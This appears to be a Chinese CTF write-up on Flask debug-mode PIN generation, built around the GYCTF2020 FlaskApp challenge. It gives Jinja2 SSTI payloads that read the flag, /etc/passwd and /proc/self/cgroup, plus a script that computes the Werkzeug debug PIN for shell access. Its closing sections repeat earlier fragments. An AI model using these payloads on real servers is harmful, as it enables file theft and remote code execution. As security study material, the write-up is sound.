Flask Debug模式PIN码安全性分析与利用<\/h1>

前言<\/h2>
当Flask开启debug模式时，debug页面会包含一个Python交互式shell，可以执行任意Python代码。这带来了严重的安全隐患，需要通过PIN码进行保护。本文将详细分析PIN码的生成机制及可能的利用方式。<\/p>

基础示例<\/h2>

from<\/span> flask import<\/span> Flask
<\/span><\/span>app =<\/span> Flask(__name__)
<\/span><\/span>
<\/span><\/span>@app<\/span>.<\/span>route("\/index"<\/span>)
<\/span><\/span>def<\/span> hello<\/span>():
<\/span><\/span>    return<\/span> Liwer  # 故意制造错误<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    app.<\/span>run(host=<\/span>"127.0.0.1"<\/span>, port=<\/span>3000<\/span>, debug=<\/span>True<\/span>)
<\/span><\/span><\/code><\/pre>当访问该应用时，会显示错误页面，其中包含：<\/p>

Web应用目录信息<\/li>
可能的Python交互式shell入口（需要PIN码）<\/li>
<\/ul>
PIN码生成机制<\/h2>
PIN码由以下6个要素组合生成，缺一不可：<\/p>

当前计算机用户名<\/strong>：运行Flask应用的操作系统用户名<\/li>
modname<\/strong>：通常为flask.app<\/code><\/li>
应用名称<\/strong>：getattr(app, "__name__", app.__class__.__name__)<\/code>，通常为Flask<\/code><\/li>
flask库下app.py的绝对路径<\/strong>：可从报错信息中获取<\/li>
当前网络MAC地址的十进制表示<\/strong>：通过str(uuid.getnode())<\/code>获取<\/li>
机器ID<\/strong>：通过get_machine_id()<\/code>获取<\/li>
<\/ol>
机器ID获取方式<\/h3>


非Docker环境<\/strong>：<\/p>

\/etc\/machine-id<\/code><\/li>
或 \/proc\/sys\/kernel\/random\/boot_id<\/code><\/li>
<\/ul>
<\/li>

Docker环境<\/strong>：<\/p>

读取\/proc\/self\/cgroup<\/code><\/li>
取第一行\/docker\/<\/code>后面的内容作为机器ID<\/li>
<\/ul>
<\/li>
<\/ul>
实战利用 - [GYCTF2020]FlaskApp<\/h2>
方法一：直接SSTI利用<\/h3>
{%<\/span> for<\/span> c in<\/span> [].<\/span>__class__.<\/span>__base__.<\/span>__subclasses__() %<\/span>}
<\/span><\/span>{%<\/span> if<\/span> c.<\/span>__name__ ==<\/span> 'catch_warnings'<\/span> %<\/span>}
<\/span><\/span>{{ c.<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>].<\/span>open('\/this_is_the_fl'<\/span> +<\/span> 'ag.txt'<\/span>, 'r'<\/span>).<\/span>read()}}
<\/span><\/span>{%<\/span> endif %<\/span>}
<\/span><\/span>{%<\/span> endfor %<\/span>}
<\/span><\/span><\/code><\/pre>方法二：通过PIN码进入交互式shell<\/h3>


获取Flask用户名<\/strong>：<\/p>
{%<\/span> for<\/span> c in<\/span> [].<\/span>__class__.<\/span>__base__.<\/span>__subclasses__() %<\/span>}
<\/span><\/span>{%<\/span> if<\/span> c.<\/span>__name__ ==<\/span> 'catch_warnings'<\/span> %<\/span>}
<\/span><\/span>{{ c.<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>].<\/span>open('\/etc\/passwd'<\/span>, 'r'<\/span>).<\/span>read() }}
<\/span><\/span>{%<\/span> endif %<\/span>}
<\/span><\/span>{%<\/span> endfor %<\/span>}
<\/span><\/span><\/code><\/pre>输出中查找运行Flask的用户名（如flaskweb<\/code>）<\/p>
<\/li>

获取app.py绝对路径<\/strong>：

从错误页面直接获取，如：

\/usr\/local\/lib\/python3.7\/site-packages\/flask\/app.py<\/code><\/p>
<\/li>

获取MAC地址十进制数<\/strong>：<\/p>

读取\/sys\/class\/net\/eth0\/address<\/code>（如72:fe:70:bd:04:59<\/code>）<\/li>
去除冒号后转换为十进制：
int("72fe70bd0459"<\/span>, 16<\/span>)  # 结果为126437138695257<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

获取机器ID<\/strong>（Docker环境）：<\/p>
{%<\/span> for<\/span> c in<\/span> [].<\/span>__class__.<\/span>__base__.<\/span>__subclasses__() %<\/span>}
<\/span><\/span>{%<\/span> if<\/span> c.<\/span>__name__ ==<\/span> 'catch_warnings'<\/span> %<\/span>}
<\/span><\/span>{{ c.<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>].<\/span>open('\/proc\/self\/cgroup'<\/span>,'r'<\/span>).<\/span>read() }}
<\/span><\/span>{%<\/span> endif %<\/span>}
<\/span><\/span>{%<\/span> endfor %<\/span>}
<\/span><\/span><\/code><\/pre>输出示例：bb89acbd6e0417d61a68ffd090617baed746e020991af325389751b3cb57338b<\/code><\/p>
<\/li>
<\/ol>
PIN码生成脚本<\/h3>
import<\/span> hashlib
<\/span><\/span>from<\/span> itertools import<\/span> chain
<\/span><\/span>
<\/span><\/span>probably_public_bits =<\/span> [
<\/span><\/span>    'flaskweb'<\/span>,  # username<\/span>
<\/span><\/span>    'flask.app'<\/span>,  # modname<\/span>
<\/span><\/span>    'Flask'<\/span>,  # getattr(app, '__name__', getattr(app.__class__, '__name__'))<\/span>
<\/span><\/span>    '\/usr\/local\/lib\/python3.7\/site-packages\/flask\/app.py'<\/span>  # getattr(mod, '__file__', None),<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span>private_bits =<\/span> [
<\/span><\/span>    '126437138695257'<\/span>,  # str(uuid.getnode()), \/sys\/class\/net\/ens33\/address<\/span>
<\/span><\/span>    'bb89acbd6e0417d61a68ffd090617baed746e020991af325389751b3cb57338b'<\/span>  # get_machine_id(), \/etc\/machine-id<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span>h =<\/span> hashlib.<\/span>md5()
<\/span><\/span>for<\/span> bit in<\/span> chain(probably_public_bits, private_bits):
<\/span><\/span>    if<\/span> not<\/span> bit:
<\/span><\/span>        continue<\/span>
<\/span><\/span>    if<\/span> isinstance(bit, str):
<\/span><\/span>        bit =<\/span> bit.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    h.<\/span>update(bit)
<\/span><\/span>h.<\/span>update(b<\/span>'cookiesalt'<\/span>)
<\/span><\/span>
<\/span><\/span>cookie_name =<\/span> '__wzd'<\/span> +<\/span> h.<\/span>hexdigest()[:20<\/span>]
<\/span><\/span>
<\/span><\/span>num =<\/span> None<\/span>
<\/span><\/span>if<\/span> num is<\/span> None<\/span>:
<\/span><\/span>    h.<\/span>update(b<\/span>'pinsalt'<\/span>)
<\/span><\/span>    num =<\/span> ('<\/span>%09d<\/span>'<\/span> %<\/span> int(h.<\/span>hexdigest(), 16<\/span>))[:9<\/span>]
<\/span><\/span>
<\/span><\/span>rv =<\/span> None<\/span>
<\/span><\/span>if<\/span> rv is<\/span> None<\/span>:
<\/span><\/span>    for<\/span> group_size in<\/span> 5<\/span>, 4<\/span>, 3<\/span>:
<\/span><\/span>        if<\/span> len(num) %<\/span> group_size ==<\/span> 0<\/span>:
<\/span><\/span>            rv =<\/span> '-'<\/span>.<\/span>join(num[x:x +<\/span> group_size].<\/span>rjust(group_size, '0'<\/span>)
<\/span><\/span>                          for<\/span> x in<\/span> range(0<\/span>, len(num), group_size))
<\/span><\/span>            break<\/span>
<\/span><\/span>    else<\/span>:
<\/span><\/span>        rv =<\/span> num
<\/span><\/span>
<\/span><\/span>print(rv)
<\/span><\/span><\/code><\/pre>注意事项<\/h3>

在某些Docker环境中，可能需要使用\/etc\/machine-id<\/code>而非\/proc\/self\/cgroup<\/code>的内容<\/li>
同一台机器多次启动Flask服务的PIN码相同<\/li>
生成PIN码需要准确获取所有6个要素<\/li>
<\/ol>
安全建议<\/h2>

生产环境切勿开启debug模式<\/li>
如必须使用debug模式，应限制访问IP<\/li>
定期检查服务器上的敏感文件权限<\/li>
使用复杂用户名增加PIN码猜测难度<\/li>
<\/ol>
参考<\/h2>

Flask调试模式PIN码安全性分析<\/a><\/li>
GYCTF2020 FlaskApp题目解析<\/a><\/li>
<\/ul>

Flask Debug模式PIN码安全性分析与利用<\/h1>

前言<\/h2> 当Flask开启debug模式时，debug页面会包含一个Python交互式shell，可以执行任意Python代码。这带来了严重的安全隐患，需要通过PIN码进行保护。本文将详细分析PIN码的生成机制及可能的利用方式。<\/p>

实战利用 - [GYCTF2020]FlaskApp<\/h2>

参考<\/h2> Flask调试模式PIN码安全性分析<\/a><\/li> GYCTF2020 FlaskApp题目解析<\/a><\/li> <\/ul>

前言<\/h2>
当Flask开启debug模式时，debug页面会包含一个Python交互式shell，可以执行任意Python代码。这带来了严重的安全隐患，需要通过PIN码进行保护。本文将详细分析PIN码的生成机制及可能的利用方式。<\/p>

参考<\/h2>

Flask调试模式PIN码安全性分析<\/a><\/li>
GYCTF2020 FlaskApp题目解析<\/a><\/li> <\/ul>